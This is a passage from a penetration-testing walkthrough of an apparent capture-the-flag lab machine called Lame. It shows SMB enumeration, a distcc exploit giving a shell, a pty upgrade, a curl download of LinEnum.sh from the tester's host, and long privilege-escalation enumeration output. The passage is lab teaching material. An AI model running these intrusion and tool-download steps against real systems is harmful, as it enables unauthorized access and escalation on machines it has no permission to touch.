Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1026 LAME\proxy (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1027 LAME\proxy (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1028 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1029 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1030 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1031 LAME\kmem (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1032 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1033 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1034 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1035 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1036 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1037 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1038 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1039 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1040 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1041 LAME\dialout (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1042 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1043 LAME\fax (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1044 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1045 LAME\voice (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1046 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1047 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1048 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1049 LAME\cdrom (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 991.
S-1-5-21-2446995257-2525374255-2673161615-1050 *unknown*\*unknown* (8)

===========================================
| Getting printer info for 10.10.10.3 |
===========================================
No printers returned.

enum4linux complete on Tue Dec 5 16:35:23 2017

This gives us a good amount more information about our target, including user accounts that exist on our target. Those could be useful if we need to try to brute force SSH. Let’s try to mount the opt and tmp shares to see if they expose any information:


root@kali:~/Pentest/10.3-lame/01-recon/02-smb# smbclient //10.10.10.3/tmp
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Dec 5 19:30:10 2017
.. DR 0 Sun May 20 15:36:12 2012
.ICE-unix DH 0 Tue Dec 5 16:21:33 2017
5117.jsvc_up R 0 Tue Dec 5 16:21:51 2017
.X11-unix DH 0 Tue Dec 5 16:21:38 2017
.X0-lock HR 11 Tue Dec 5 16:21:38 2017

7282168 blocks of size 1024. 5678404 blocks available
smb: \> quit
root@kali:~/Pentest/10.3-lame/01-recon/02-smb# smbclient //10.10.10.3/opt
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED

OK, so we can see that there is some info, but opt isn’t anonymously mountable and nothing stands out immediately as interesting or useful necessarily. We can always come back to this. Let’s keep looking.

distccd (TCP 3632)

So this is a very new service for me and not one I’ve found before. First things first, what the heck is it… After googling around, the first link I find is https://linux.die.net/man/1/distccd which explains that this is a distributed C / C++ compiler. That could be very useful for executing code for us. Lets search for exploits:

First result shows us another potential exploit. Since our first one failed, this might not be a good idea, but let’s give it a try just in case:

Exploit: https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec

Yes! We have a shell! Let’s upgrade to a normal tty though:


python -c 'import pty; pty.spawn("/bin/sh")'
sh-3.2$

Much better.

Privilege Escalation

Enumeration

Now we need to escalate privileges. First things first, we need to start over and beginning enumerating. We’ll start off by using LinEnum.sh from reboot user (available at https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh).


sh-3.2$ cd /tmp
cd /tmp
sh-3.2$ curl -O http://10.10.14.5/enum/LinEnum.sh
curl -O http://10.10.14.5/enum/LinEnum.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 43283 100 43283 0 0 161k 0 --:--:-- --:--:-- --:--:-- 775k
sh-3.2$ chmod +x LinEnum.sh
chmod +x LinEnum.sh

Now that we’ve downloaded it, we’re ready to run it.


sh-3.2$ ./LinEnum.sh -t
./LinEnum.sh -t
#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
#

Debug Info
thorough tests = enabled

Scan started at:
Tue Dec 5 19:46:58 EST 2017

### SYSTEM ##############################################
Kernel information:
Linux lame 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Kernel information (continued):
Linux version 2.6.24-16-server (buildd@palmer) (gcc version 4.2.3 (Ubuntu 4.2.3-2ubuntu7)) #1 SMP Thu Apr 10 13:58:00 UTC 2008

Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04"

Hostname:
lame

### USER/GROUP ##########################################
Current user/group info:
uid=1(daemon) gid=1(daemon) groups=1(daemon)

Users that have previously logged onto the system:
Username Port From Latest
root pts/0 :0.0 Tue Dec 5 16:21:39 -0500 2017
makis pts/1 192.168.150.100 Tue Mar 14 18:32:04 -0400 2017

Who else is logged on:
19:46:59 up 3:25, 1 user, load average: 0.99, 0.97, 0.91
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 :0.0 16:21 3:25 0.00s 0.00s -bash

Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
uid=101(dhcp) gid=102(dhcp) groups=102(dhcp)
uid=102(syslog) gid=103(syslog) groups=103(syslog)
uid=103(klog) gid=104(klog) groups=104(klog)
uid=104(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=105(bind) gid=113(bind) groups=113(bind)
uid=106(postfix) gid=115(postfix) groups=115(postfix)
uid=107(ftp) gid=65534(nogroup) groups=65534(nogroup)
uid=108(postgres) gid=117(postgres) groups=117(postgres),114(ssl-cert)
uid=109(mysql) gid=118(mysql) groups=118(mysql)
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)
uid=111(distccd) gid=65534(nogroup) groups=65534(nogroup)
uid=1002(service) gid=1002(service) groups=1002(service)
uid=112(telnetd) gid=120(telnetd) groups=120(telnetd),43(utmp)
uid=113(proftpd) gid=65534(nogroup) groups=65534(nogroup)
uid=114(statd) gid=65534(nogroup) groups=65534(nogroup)
uid=115(snmp) gid=65534(nogroup) groups=65534(nogroup)
uid=1003(makis) gid=1003(makis) groups=1003(makis),4(adm),112(admin)

Sample entires from /etc/passwd (searching for uid values 0, 500, 501, 502, 1000, 1001, 1002, 2000, 2001, 2002):
root:x:0:0:root:/root:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash

Super user account(s):
root

***We can read root's home directory!
total 80K
drwxr-xr-x 13 root root 4.0K Dec 5 16:21 .
drwxr-xr-x 21 root root 4.0K May 20 2012 ..
-rw------- 1 root root 373 Dec 5 16:21 .Xauthority
lrwxrwxrwx 1 root root 9 May 14 2012 .bash_history -> /dev/null
-rw-r--r-- 1 root root 2.2K Oct 20 2007 .bashrc
drwx------ 3 root root 4.0K May 20 2012 .config
drwx------ 2 root root 4.0K May 20 2012 .filezilla
drwxr-xr-x 5 root root 4.0K Dec 5 16:21 .fluxbox
drwx------ 2 root root 4.0K May 20 2012 .gconf
drwx------ 2 root root 4.0K May 20 2012 .gconfd
drwxr-xr-x 2 root root 4.0K May 20 2012 .gstreamer-0.10
drwx------ 4 root root 4.0K May 20 2012 .mozilla
-rw-r--r-- 1 root root 141 Oct 20 2007 .profile
drwx------ 5 root root 4.0K May 20 2012 .purple
-rwx------ 1 root root 4 May 20 2012 .rhosts
drwxr-xr-x 2 root root 4.0K May 20 2012 .ssh
drwx------ 2 root root 4.0K Dec 5 16:21 .vnc
drwxr-xr-x 2 root root 4.0K May 20 2012 Desktop
-rwx------ 1 root root 401 May 20 2012 reset_logs.sh
-rw------- 1 root root 33 Mar 14 2017 root.txt
-rw-r--r-- 1 root root 118 Dec 5 16:21 vnc.log

Are permissions on /home directories lax:
total 24K
drwxr-xr-x 6 root root 4.0K Mar 14 2017 .
drwxr-xr-x 21 root root 4.0K May 20 2012 ..
drwxr-xr-x 2 root nogroup 4.0K Mar 17 2010 ftp
drwxr-xr-x 2 makis makis 4.0K Mar 14 2017 makis
drwxr-xr-x 2 service service 4.0K Apr 16 2010 service
drwxr-xr-x 3 1001 1001 4.0K May 7 2010 user

World-readable files within /home:
-rw-r--r-- 1 service service 586 Apr 16 2010 /home/service/.profile
-rw-r--r-- 1 service service 2928 Apr 16 2010 /home/service/.bashrc
-rw-r--r-- 1 service service 220 Apr 16 2010 /home/service/.bash_logout
-rw-r--r-- 1 makis makis 33 Mar 14 2017 /home/makis/user.txt
-rw-r--r-- 1 makis makis 586 Mar 14 2017 /home/makis/.profile
-rw-r--r-- 1 makis makis 0 Mar 14 2017 /home/makis/.sudo_as_admin_successful
-rw-r--r-- 1 makis makis 2928 Mar 14 2017 /home/makis/.bashrc
-rw-r--r-- 1 makis makis 220 Mar 14 2017 /home/makis/.bash_logout
-rw-r--r-- 1 1001 1001 586 Mar 31 2010 /home/user/.profile
-rw-r--r-- 1 1001 1001 2928 Mar 31 2010 /home/user/.bashrc
-rw-r--r-- 1 1001 1001 220 Mar 31 2010 /home/user/.bash_logout

Home directory contents:
total 27M
drwxr-xr-x 2 root root 12K Dec 5 16:59 .
drwxr-xr-x 12 root root 4.0K Apr 28 2010 ..
-rw------- 1 root daemon 679 Dec 5 16:59 .bash_history
-rwxr-xr-x 1 root root 5.2K Mar 5 2007 MAKEFLOPPIES
-rwxr-xr-x 1 root root 1.1K Mar 9 2010 a2dismod
-rwxr-xr-x 1 root root 839 Mar 9 2010 a2dissite
-rwxr-xr-x 1 root root 1.7K Mar 9 2010 a2enmod
-rwxr-xr-x 1 root root 923 Mar 9 2010 a2ensite
lrwxrwxrwx 1 root root 5 Apr 28 2010 aa-audit -> audit
lrwxrwxrwx 1 root root 7 Apr 28 2010 aa-autodep -> autodep
lrwxrwxrwx 1 root root 8 Apr 28 2010 aa-complain -> complain
lrwxrwxrwx 1 root root 7 Apr 28 2010 aa-enforce -> enforce
lrwxrwxrwx 1 root root 7 Apr 28 2010 aa-genprof -> genprof
lrwxrwxrwx 1 root root 7 Apr 28 2010 aa-logprof -> logprof
lrwxrwxrwx 1 root root 15 Apr 28 2010 aa-status -> apparmor_status
lrwxrwxrwx 1 root root 10 Apr 28 2010 aa-unconfined -> unconfined
-rwxr-xr-x 1 root root 43K Mar 9 2010 ab
-rwxr-xr-x 1 root root 63K Mar 12 2008 accessdb
-rwxr-xr-x 1 root root 704 Mar 31 2008 add-shell
lrwxrwxrwx 1 root root 7 Apr 28 2010 addgroup -> adduser
-rwxr-xr-x 1 root root 33K Oct 23 2007 adduser
-rwxr-xr-x 1 root root 341K Mar 9 2010 apache2
-rwxr-xr-x 1 root root 4.3K Mar 9 2010 apache2ctl
-rwxr-xr-x 1 root root 6.4K Apr 7 2008 apparmor_status
-rwxr-xr-x 1 root root 43K Dec 13 2007 arp
-rwxr-xr-x 1 root root 30K Apr 12 2008 arpd
-rwxr-xr-x 1 root root 16K Feb 20 2007 atd
-rwxr-xr-x 1 root root 3.5K Apr 7 2008 audit
-rwxr-xr-x 1 root root 3.8K Apr 7 2008 autodep
-rwxr-xr-x 1 root root 8.8K Jul 31 2007 biosdecode
-rwxr-xr-x 1 root root 19K Oct 4 2007 chat
-rwxr-xr-x 1 root root 950 Mar 9 2010 check_forensic
-rwxr-xr-x 1 root root 3.3K Mar 9 2010 checkgid
-rwxr-xr-x 1 root root 5.4K Nov 22 2007 checkrhosts
-rwxr-xr-x 1 root root 25K Apr 2 2008 chgpasswd
-rwxr-xr-x 1 root root 23K Apr 2 2008 chpasswd
-rwxr-xr-x 1 root root 23K Apr 4 2008 chroot
-rwxr-xr-x 1 root root 4.7K Feb 12 2008 cleanup-info
-rwxr-xr-x 1 root root 3.6K Apr 7 2008 complain
lrwxrwxrwx 1 root root 4 Apr 28 2010 cpgr -> cppw
-rwxr-xr-x 1 root root 27K Apr 2 2008 cppw
-rwxr-xr-x 1 root root 31K Apr 8 2008 cron
-rwxr-xr-x 1 root root 9.0K Apr 14 2008 cytune
-rwxr-xr-x 1 root root 1.4K Jun 17 2006 defoma-reconfigure
lrwxrwxrwx 1 root root 7 Apr 28 2010 delgroup -> deluser
-rwxr-xr-x 1 root root 15K Oct 23 2007 deluser
-rwxr-xr-x 1 root root 48K Jul 31 2007 dmidecode
-rwxr-xr-x 1 root root 21K Apr 9 2008 dnssec-keygen
-rwxr-xr-x 1 root root 55K Apr 9 2008 dnssec-signzone
-rwxr-xr-x 1 root root 11K Feb 12 2008 dpkg-divert
-rwxr-xr-x 1 root root 3.4K Mar 11 2008 dpkg-preconfigure
-rwxr-xr-x 1 root root 3.4K Mar 11 2008 dpkg-reconfigure
-rwxr-xr-x 1 root root 5.9K Feb 12 2008 dpkg-statoverride
-rwxr-xr-x 1 root root 254 May 20 2012 druby_timeserver.rb
-rwxr-xr-x 1 root root 3.8K Apr 7 2008 enforce
-rwxr-xr-x 1 root root 108K Oct 23 2007 ethtool
-rwxr-xr-x 1 root root 40K Dec 2 2008 exportfs
-rwxr-xr-x 1 root root 2.1K Mar 5 2007 fdutilsconfig
-rwxr-xr-x 1 root root 6.4K Mar 27 2008 filefrag
-rwxr-xr-x 1 root root 27K Feb 20 2008 ftpasswd
-rwxr-xr-x 1 root root 31K Feb 20 2008 ftpquota
-rwxr-xr-x 1 root root 5.8K Feb 20 2008 ftpshut
-rwxr-xr-x 1 root root 12K Feb 20 2008 ftpstats
-rwxr-xr-x 1 root root 2.6K Apr 22 2008 gconf-schemas
-rwxr-xr-x 1 root root 5.1K Apr 7 2008 genprof
-rwxr-xr-x 1 root root 29K Apr 2 2008 groupadd
-rwxr-xr-x 1 root root 21K Apr 2 2008 groupdel
-rwxr-xr-x 1 root root 25K Apr 2 2008 groupmod
-rwxr-xr-x 1 root root 28K Apr 2 2008 grpck
-rwxr-xr-x 1 root root 21K Apr 2 2008 grpconv
-rwxr-xr-x 1 root root 21K Apr 2 2008 grpunconv
-rwxr-xr-x 1 root root 140K Dec 10 2009 grub
-rwxr-xr-x 1 root root 153 Dec 10 2009 grub-floppy
-rwxr-xr-x 1 root root 17K Dec 10 2009 grub-install
-rwxr-xr-x 1 root root 2.3K Dec 10 2009 grub-md5-crypt
-rwxr-xr-x 1 root root 1.5K Dec 10 2009 grub-reboot
-rwxr-xr-x 1 root root 3.2K Dec 10 2009 grub-set-default
-rwxr-xr-x 1 root root 2.5K Dec 10 2009 grub-terminfo
-rwxr-xr-x 1 root root 7.6K Dec 2 2008 gss_clnt_send_err
-rwxr-xr-x 1 root root 217 Dec 2 2008 gss_destroy_creds
-rwxr-xr-x 1 root root 17K Mar 9 2010 htcacheclean
-rwxr-xr-x 1 root root 7.5K Mar 9 2010 httxt2dbm
-rwxr-xr-x 1 root root 26K Aug 17 2009 iconvconfig
lrwxrwxrwx 1 root root 7 Apr 28 2010 in.proftpd -> proftpd
-rwxr-xr-x 1 root root 8.1K Nov 22 2007 in.rexecd
-rwxr-xr-x 1 root root 16K Nov 22 2007 in.rlogind
-rwxr-xr-x 1 root root 15K Nov 22 2007 in.rshd
-rwxr-xr-x 1 root root 36K Dec 17 2006 in.telnetd
-rwxr-xr-x 1 root root 12K Dec 17 2006 in.tftpd
-rwxr-xr-x 1 root root 12K Aug 16 2007 inputattach
-rwxr-xr-x 1 root root 16K Feb 12 2008 install-info
lrwxrwxrwx 1 root root 19 May 20 2012 install-menu -> ../bin/install-menu
-rwxr-xr-x 1 root root 4.5K Oct 26 2004 install-sgmlcatalog
-rwxr-xr-x 1 root root 11K Apr 19 2008 invoke-rc.d
-rwxr-xr-x 1 root root 19K Dec 3 2007 itox
-rwxr-xr-x 1 root root 2.4K Jul 31 2007 laptop-detect
-rwxr-xr-x 1 root root 6.8K Mar 11 2008 locale-gen
-rwxr-xr-x 1 root root 2.0K Apr 7 2008 logprof
-rwxr-xr-x 1 root root 6.7K Mar 9 2010 logresolve
-rwxr-xr-x 1 root root 38K Jun 19 2006 logrotate
-rwxr-xr-x 1 root root 66K Feb 24 2008 lsusb
-rwxr-xr-x 1 root root 3.8K Feb 20 2008 make-ssl-cert
-rwxr-xr-x 1 root root 26K Jun 19 2006 mii-diag
-rwxr-xr-x 1 root root 11K Mar 31 2008 mkboot
-rwxr-xr-x 1 root root 7.0K Mar 14 2008 mkinitramfs
-rwxr-xr-x 1 root root 1.9K Dec 21 2006 mkinitramfs-kpkg
-rwxr-xr-x 1 root root 4.4K Mar 27 2008 mklost+found
-rwxr-xr-x 1 root root 206 Apr 28 2010 mksmbpasswd
-rwxr-xr-x 1 root root 7.1M Mar 28 2008 mysqld
-rwxr-xr-x 1 root root 1.9M Mar 28 2008 mysqlmanager
-rwxr-xr-x 1 root root 343K Apr 9 2008 named
-rwxr-xr-x 1 root root 21K Apr 9 2008 named-checkconf
-rwxr-xr-x 1 root root 19K Apr 9 2008 named-checkzone
lrwxrwxrwx 1 root root 15 Apr 28 2010 named-compilezone -> named-checkzone
-rwxr-xr-x 1 root root 2.0M Mar 28 2008 ndb_cpcd
-rwxr-xr-x 1 root root 2.1M Mar 28 2008 ndb_mgmd
-rwxr-xr-x 1 root root 3.4M Mar 28 2008 ndbd
-rwxr-xr-x 1 root root 28K Apr 2 2008 newusers
-rwxr-xr-x 1 root root 15K Dec 2 2008 nfsstat
-rwxr-xr-x 1 root root 948K Apr 28 2010 nmbd
-rwxr-xr-x 1 root root 3.2K Apr 2 2008 nologin
-rwxr-xr-x 1 root root 45K Mar 7 2008 ntpdate
-rwxr-xr-x 1 root root 530 Mar 7 2008 ntpdate-debian
-rwxr-xr-x 1 root root 4.9K Jul 31 2007 ownership
-rwxr-xr-x 1 root root 2.9K Apr 9 2008 pam_getenv
-rwxr-xr-x 1 root root 3.4K May 20 2007 pg_maintenance
-rwxr-xr-x 1 root root 540 Jan 28 2008 popcon-largest-unused
-rwxr-xr-x 1 root root 4.1K Jan 28 2008 popularity-contest
-rwxr-xr-x 1 root root 12K Apr 18 2008 postalias
-rwxr-xr-x 1 root root 9.8K Apr 18 2008 postcat
-rwxr-xr-x 1 root root 63K Apr 18 2008 postconf
-r-xr-sr-x 1 root postdrop 9.9K Apr 18 2008 postdrop
-rwxr-xr-x 1 root root 7.1K Apr 18 2008 postfix
-rwxr-xr-x 1 root root 5.7K Apr 18 2008 postkick
-rwxr-xr-x 1 root root 6.0K Apr 18 2008 postlock
-rwxr-xr-x 1 root root 5.9K Apr 18 2008 postlog
-rwxr-xr-x 1 root root 12K Apr 18 2008 postmap
-r-xr-sr-x 1 root postdrop 11K Apr 18 2008 postqueue
-rwxr-xr-x 1 root root 17K Apr 18 2008 postsuper
-rwxr-xr-x 1 root root 60K Jun 22 2007 pppconfig
-rwsr-xr-- 1 root dip 263K Oct 4 2007 pppd
-rwxr-xr-x 1 root root 14K Oct 4 2007 pppdump
-rwxr-xr-x 1 root root 18K Oct 4 2007 pppoe-discovery
-rwxr-xr-x 1 root root 19K Dec 3 2007 pppoeconf
-rwxr-xr-x 1 root root 9.8K Oct 4 2007 pppstats
-rwxr-xr-x 1 root root 544K Feb 20 2008 proftpd
-rwxr-xr-x 1 root root 26K Apr 2 2008 pwck
-rwxr-xr-x 1 root root 22K Apr 2 2008 pwconv
-rwxr-xr-x 1 root root 20K Apr 2 2008 pwunconv
-rwxr-xr-x 1 root root 7.3K Apr 18 2008 qmqp-sink
-rwxr-xr-x 1 root root 12K Apr 18 2008 qmqp-source
-rwxr-xr-x 1 root root 13K Apr 18 2008 qshape
lrwxrwxrwx 1 root root 4 Apr 28 2010 ramsize -> rdev
-rwxr-xr-x 1 root root 7.7K Apr 14 2008 rdev
-rwxr-xr-x 1 root root 11K Apr 14 2008 readprofile
-rwxr-xr-x 1 root root 502 Jun 10 2008 rebuild-security-providers
-rwxr-xr-x 1 root root 749 Mar 31 2008 remove-shell
-rwxr-xr-x 1 root root 9.1K Apr 18 2008 rmail
lrwxrwxrwx 1 root root 21 Apr 28 2010 rmt -> /etc/alternatives/rmt
-rwxr-xr-x 1 root root 24K Apr 4 2008 rmt-tar
-rwxr-xr-x 1 root root 24K Apr 9 2008 rndc
-rwxr-xr-x 1 root root 12K Apr 9 2008 rndc-confgen
lrwxrwxrwx 1 root root 4 Apr 28 2010 rootflags -> rdev
-rwxr-xr-x 1 root root 8.4K Mar 9 2010 rotatelogs
-rwxr-xr-x 1 root root 52K Dec 2 2008 rpc.gssd
-rwxr-xr-x 1 root root 35K Dec 2 2008 rpc.idmapd
-rwxr-xr-x 1 root root 72K Dec 2 2008 rpc.mountd
-rwxr-xr-x 1 root root 9.9K Dec 2 2008 rpc.nfsd
-rwxr-xr-x 1 root root 21K Dec 2 2008 rpc.svcgssd
-rwxr-xr-x 1 root root 8.6K Dec 2 2008 rpcdebug
-rwxr-xr-x 1 root root 11K Apr 14 2008 rtcwake
-rwxr-xr-x 1 root root 5.8K Jul 30 2007 safe_finger
-rwxr-xr-x 1 root root 21K Apr 18 2008 sendmail
-rwxr-xr-x 1 root root 5.7K Feb 6 2008 setvesablank
-rwxr-xr-x 1 root root 3.0M Apr 28 2010 smbd
-rwxr-xr-x 1 root root 20K Apr 18 2008 smtp-sink
-rwxr-xr-x 1 root root 16K Apr 18 2008 smtp-source
-rwxr-xr-x 1 root root 24K Sep 24 2009 snmpd
-rwxr-xr-x 1 root root 27K Sep 24 2009 snmptrapd
-rwxr-xr-x 1 root root 2.4K Mar 9 2010 split-logfile
-rwxr-xr-x 1 root root 363K Apr 6 2008 sshd
lrwxrwxrwx 1 root root 17 May 20 2012 su-to-root -> ../bin/su-to-root
-rwxr-xr-x 1 root root 3.9K Nov 23 2007 syslog-facility
-rwxr-xr-x 1 root root 3.7K Nov 23 2007 syslogd-listfiles
-rwxr-xr-x 1 root root 4.4K Jul 30 2007 tcpd
-rwxr-xr-x 1 root root 17K Jul 30 2007 tcpdchk
-rwxr-xr-x 1 root root 14K Jul 30 2007 tcpdmatch
-rwxr-xr-x 1 root root 533K Nov 6 2007 tcpdump
-rwxr-xr-x 1 root root 4.6K Jul 30 2007 try-from
-rwxr-xr-x 1 root root 6.6K Apr 14 2008 tunelp
lrwxrwxrwx 1 root root 13 Apr 28 2010 udevmonitor -> /sbin/udevadm
-rwxr-xr-x 1 root root 44K Apr 7 2008 ufw
-rwxr-xr-x 1 root root 3.4K Apr 7 2008 unconfined
-rwxr-xr-x 1 root root 23K Feb 12 2008 update-alternatives
-rwxr-xr-x 1 root root 5.7K Oct 26 2004 update-catalog
-rwxr-xr-x 1 root root 4.7K Nov 13 2007 update-fonts-alias
-rwxr-xr-x 1 root root 4.0K Nov 13 2007 update-fonts-dir
-rwxr-xr-x 1 root root 6.1K Nov 13 2007 update-fonts-scale
-rwxr-xr-x 1 root root 3.4K Apr 22 2008 update-gconf-defaults
-rwxr-xr-x 1 root root 40K Dec 10 2009 update-grub
-rwxr-xr-x 1 root root 5.9K Oct 24 2007 update-inetd
-rwxr-xr-x 1 root root 9.5K Mar 11 2008 update-initramfs
-rwxr-xr-x 1 root root 3.0K Apr 1 2008 update-java-alternatives
-rwxr-xr-x 1 root root 2.8K Mar 11 2008 update-locale
-rwxr-xr-x 1 root root 6.2K Apr 1 2008 update-mime
-rwxr-xr-x 1 root root 2.2K May 5 2009 update-pangox-aliases
-rwxr-xr-x 1 root root 17K Nov 19 2007 update-passwd
-rwxr-xr-x 1 root root 13K Mar 31 2008 update-python-modules
-rwxr-xr-x 1 root root 5.5K Apr 19 2008 update-rc.d
-rwxr-xr-x 1 root root 644 Feb 24 2008 update-usbids
-rwxr-xr-x 1 root root 60K Apr 2 2008 useradd
-rwxr-xr-x 1 root root 39K Apr 2 2008 userdel
-rwxr-xr-x 1 root root 59K Apr 2 2008 usermod
-rwsr-sr-x 1 libuuid libuuid 13K Mar 27 2008 uuidd
-rwxr-xr-x 1 root root 1.8K Mar 11 2008 validlocale
-rwxr-xr-x 1 root root 6.1K Feb 6 2008 vcstime
lrwxrwxrwx 1 root root 4 Apr 28 2010 vidmode -> rdev
lrwxrwxrwx 1 root root 4 Apr 28 2010 vigr -> vipw
-rwxr-xr-x 1 root root 27K Apr 2 2008 vipw
-rwxr-xr-x 1 root root 68K Feb 25 2008 visudo
-rwxr-xr-x 1 root root 6.7K Jul 31 2007 vpddecode
-rwxr-xr-x 1 root root 107K May 20 2012 vsftpd
-rwxr-xr-x 1 root root 5.6K Feb 6 2008 writevt
-rwxr-xr-x 1 root root 3.9K Dec 3 2007 xconv.pl
-rwxr-xr-x 1 root root 135K Dec 3 2007 xinetd
-rwxr-xr-x 1 root root 34K Aug 17 2009 zic

SSH keys/host information found in the following locations:
-rw-r--r-- 1 root root 442 May 20 2012 /root/.ssh/known_hosts
-rw-r--r-- 1 root root 405 May 17 2010 /root/.ssh/authorized_keys

Root is allowed to login via SSH:
PermitRootLogin yes

### ENVIRONMENTAL #######################################
Environment information:
_DISTCC_SAFEGUARD=1
TERM=linux
QUIET=no
PATH=/sbin:/bin:/usr/sbin:/usr/bin
runlevel=2
RUNLEVEL=2
UPSTART_EVENT=runlevel
PWD=/tmp
VERBOSE=no
previous=N
PREVLEVEL=N
SHLVL=7
UPSTART_JOB=rc2
UPSTART_JOB_ID=5
_=/usr/bin/env

Path information:
/sbin:/bin:/usr/sbin:/usr/bin

Available shells:
# /etc/shells: valid login shells
/bin/csh
/bin/sh
/usr/bin/es
/usr/bin/ksh
/bin/ksh
/usr/bin/rc
/usr/bin/tcsh
/bin/tcsh
/usr/bin/esh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/screen

Current umask value:
u=rwx,g=rx,o=rx
0022

Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7

### JOBS/TASKS ##########################################
Cron jobs:
-rw-r--r-- 1 root root 724 Apr 8 2008 /etc/crontab

/etc/cron.d:
total 20
drwxr-xr-x 2 root root 4096 May 14 2012 .
drwxr-xr-x 95 root root 4096 Dec 5 16:21 ..
-rw-r--r-- 1 root root 102 Apr 8 2008 .placeholder
-rw-r--r-- 1 root root 492 Jan 6 2010 php5
-rw-r--r-- 1 root root 1323 Mar 31 2008 postgresql-common

/etc/cron.daily:
total 60
